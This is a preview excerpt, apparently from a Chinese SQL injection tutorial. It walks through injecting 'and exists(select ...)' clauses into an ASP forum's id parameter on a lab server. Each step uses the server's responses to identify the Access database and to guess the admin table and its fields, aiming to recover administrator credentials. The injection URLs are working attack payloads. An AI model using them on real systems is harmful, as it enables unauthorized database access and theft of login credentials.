ID:12780479
大小:7.68 MB
頁數(shù):46頁
時間:2018-07-19
4、漏洞來獲取我們想要的信息呢,測試之前我們是不知道對方所使用的數(shù)據(jù)庫類型也不知道數(shù)據(jù)庫里面有哪些表、字段等等(類似blackboxtest),一般情況下asp可以與access和mssql數(shù)據(jù)庫結(jié)合,首先我們來判斷一下數(shù)據(jù)庫類型在id參數(shù)后面加上andexists(select*frommsysobjects)注:mysysobjects是access的系統(tǒng)表完整的測試語句:http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(select*frommsysobjects)回車提交到服務器端如圖,根
5、據(jù)服務器返回結(jié)果,(MicrosoftJETDatabaseEngine錯誤'80040e09'不能讀取記錄;在'msysobjects'上沒有讀取數(shù)據(jù)權(quán)限。/bbs/gshow.asp,行11)說明存在msysobjects表,也就是說后臺是采用的access數(shù)據(jù)庫(若服務器返回[Microsoft][ODBCSQLServerDriver][SQLServer]對象名'msysobjects'無效。則說明是sqlserver數(shù)據(jù)庫,相關(guān)方法會在下面講述,這里重點討論access數(shù)據(jù)庫)下面我們來進一步獲取我們想要的信息一般網(wǎng)站重要的信息就是后臺管理
6、員登陸帳號密碼了,我們提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(select*fromusers)(判斷數(shù)據(jù)庫中是否存在users表)根據(jù)圖中返回結(jié)果提示users表不存在,那么我們繼續(xù)來提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(select*fromadmin服務器端返回的數(shù)據(jù)和http://192.168.80.128:8181/bbs/gshow.asp?id=1一樣這是因為參數(shù)一起帶入數(shù)據(jù)庫里面就變成了
7、select*fromgonggaowhereid=1andexists(select*fromadmin)由于存在admin表條件成立就和select*fromgonggaowhereid=1的查詢返回結(jié)果一樣了,找到了admin表現(xiàn)在就以此類推猜測字段提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(selectuserfromadmin)服務器返回”至少一個參數(shù)沒有被指定值”說明不存在user字段,繼續(xù)提交http://192.168.80.128:8181/bbs/gshow.as
8、p?id=1andexists(selectadminfromadmin)服務器返回正常,說明
此文檔下載收益歸作者所有